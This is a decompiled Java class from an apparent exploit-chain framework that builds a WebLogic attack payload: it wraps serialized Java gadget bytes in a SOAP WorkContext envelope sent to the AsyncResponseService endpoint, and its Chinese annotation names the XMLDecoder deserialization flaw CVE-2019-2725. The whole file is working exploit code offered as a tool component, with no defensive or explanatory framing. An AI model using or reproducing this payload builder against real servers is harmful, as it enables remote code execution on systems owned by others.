package com.ar3h.chains.gadget.impl.common.other;

import com.ar3h.chains.common.Gadget;
import com.ar3h.chains.common.GadgetChain;
import com.ar3h.chains.common.GadgetContext;
import com.ar3h.chains.common.Tag;
import com.ar3h.chains.common.annotations.GadgetAnnotation;
import com.ar3h.chains.common.annotations.GadgetTags;
import com.ar3h.chains.common.enums.Authors;
import com.ar3h.chains.common.util.XMLDecoderUtil;

@GadgetAnnotation(name = "将Java反序列化数据转为XMLDecoder格式", description = "适用于 XMLDecoder 反序列化，例如 WebLogic CVE-2019-2725, 依赖 oracle.toplink.internal.sessions.UnitOfWorkChangeSet 类", authors = {Authors._4ra1n}, priority = 20)
@GadgetTags(tags = {Tag.Other}, nextTags = {Tag.JavaNativeDeserializePayload, Tag.CustomJavaDeserialize})
/* loaded from: input_file:BOOT-INF/lib/chains-core-1.4.1.jar:com/ar3h/chains/gadget/impl/common/other/XMLDecoder.class */
public class XMLDecoder implements Gadget {
    private static String template = "<?xml version=\"1.0\" encoding=\"utf-8\" ?>\n    <soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"\n    xmlns:wsa=\"http://www.w3.org/2005/08/addressing\"\n    xmlns:asy=\"http://www.bea.com/async/AsyncResponseService\">\n    <soapenv:Header> <wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/>\n    <work:WorkContext xmlns:work=\"http://bea.com/2004/06/soap/workarea/\">\n    <class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void>%s</void></class>\n     </work:WorkContext>\n     </soapenv:Header>\n     <soapenv:Body></soapenv:Body></soapenv:Envelope>";

    public Object getObject(Object obj) throws Exception {
        return String.format(template, XMLDecoderUtil.generateClassBytesXml((byte[]) obj));
    }

    @Override // com.ar3h.chains.common.Gadget
    public Object invoke(GadgetContext gadgetContext, GadgetChain gadgetChain) throws Exception {
        return getObject(gadgetChain.doCreate(gadgetContext));
    }
}
